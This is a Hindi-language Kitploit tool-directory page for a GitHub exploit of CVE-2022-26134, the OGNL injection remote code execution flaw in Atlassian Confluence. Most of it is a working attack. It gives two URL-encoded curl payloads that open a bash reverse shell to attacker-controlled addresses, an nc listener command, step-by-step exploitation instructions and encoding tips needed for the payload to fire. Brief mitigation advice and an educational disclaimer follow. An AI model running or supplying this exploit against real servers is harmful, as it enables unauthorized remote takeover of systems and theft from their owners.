Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2022-26134 — Atlassian के Questions for Confluence ऐप CVE-2022-26134 का सक्रिय शोषण | Kitploit
उपकरण/GitHubGitHub/khalidhaimur/cve-2022-26134
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षारिमोट एक्सेस टूल
GitHubkhalidhaimur/cve-2022-26134

CVE-2022-26134

Atlassian के Questions for Confluence ऐप CVE-2022-26134 का सक्रिय शोषण

रिपॉजिटरी देखें
1 साल पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

कॉन्फ्लुएंस CVE-2022-26134 का सक्रिय शोषण

अवलोकन

CVE-2022-26134 एक गंभीर रिमोट कोड निष्पादन (RCE) कमजोरी है जो Atlassian Confluence को प्रभावित करती है। यह कमजोरी अप्रमाणित हमलावरों को कमजोर एंडपॉइंट्स में OGNL एक्सप्रेशन इंजेक्ट करके मनमाना कोड निष्पादित करने की अनुमति देती है।

प्रभावित संस्करण

  • पैच किए गए रिलीज़ से पहले Atlassian Confluence Server और Data Center के सभी समर्थित संस्करण।

शोषण विवरण

निम्नलिखित CURL कमांड इस कमजोरी के सक्रिय शोषण को प्रदर्शित करता है, जो रिवर्स शेल निष्पादित करने के लिए Java के Nashorn इंजन का उपयोग करता है:

root@kitploit:~
curl -v http://10.0.0.28:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/10.0.0.28/1270%200%3E%261%27%29.start%28%29%22%29%7D/

इन संशोधनों को करते समय, हमें URL एन्कोडिंग को भी ध्यान में रखना होगा। प्रूफ-ऑफ-कॉन्सेप्ट में पेलोड स्ट्रिंग पूरी तरह से URL एन्कोडेड नहीं है। कुछ वर्ण (विशेष रूप से ".", "-" और "/") एन्कोडेड नहीं हैं। हालांकि हमेशा ऐसा नहीं होता, इस शोषण के लिए, यह पेलोड के काम करने के लिए महत्वपूर्ण साबित होता है। यदि इनमें से कोई भी वर्ण एन्कोडेड है, तो सर्वर URL को अलग तरीके से पार्स करेगा, और पेलोड निष्पादित नहीं हो सकता है। इसका मतलब है कि हम संशोधन के बाद पूरे पेलोड पर URL एन्कोडिंग लागू नहीं कर सकते।

curl http://192.168.50.63:8090/%24%7Bnew%20javax.script.ScriptEngineManager%28%29.getEngineByName%28%22nashorn%22%29.eval%28%22new%20java.lang.ProcessBuilder%28%29.command%28%27bash%27%2C%27-c%27%2C%27bash%20-i%20%3E%26%20/dev/tcp/192.168.118.4/4444%200%3E%261%27%29.start%28%29%22%29%7D/

पेलोड का विवरण

  1. ${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval(...)}
    • एक OGNL एक्सप्रेशन का मूल्यांकन करने के लिए Java Nashorn स्क्रिप्ट इंजन का उपयोग करता है।
  2. new java.lang.ProcessBuilder().command('bash','-c','bash -i > /dev/tcp/10.0.0.28/1270 0>&1').start()
    • 10.0.0.28:1270 पर वापस कनेक्ट होने वाला एक रिवर्स शेल स्पॉन करता है।

शोषण के चरण

  1. अपनी हमला करने वाली मशीन पर एक लिसनर सेट अप करें:
    root@kitploit:~
    nc -lvnp 1270
    
  2. CURL शोषण कमांड निष्पादित करें।
  3. सफल शोषण पर, आपको एक रिवर्स शेल प्राप्त होगा।

शमन

  • Atlassian ने प्रभावित संस्करणों के लिए सुरक्षा पैच जारी किए हैं। तुरंत नवीनतम संस्करण में अपडेट करने की अत्यधिक अनुशंसा की जाती है।
  • अविश्वसनीय स्रोतों से Confluence सर्वर तक पहुंच प्रतिबंधित करें।
  • OGNL एक्सप्रेशन वाले संदिग्ध अनुरोधों के लिए लॉग की निगरानी करें।

संदर्भ

  • Atlassian सुरक्षा सलाहकार
  • CVE-2022-26134 विवरण

अस्वीकरण

यह दस्तावेज़ केवल शैक्षिक उद्देश्यों के लिए है। सिस्टम का अनधिकृत शोषण अवैध है और इसके गंभीर परिणाम हो सकते हैं। सुरक्षा मूल्यांकन करने से पहले हमेशा उचित प्राधिकरण प्राप्त करें।

टूल डाउनलोड करें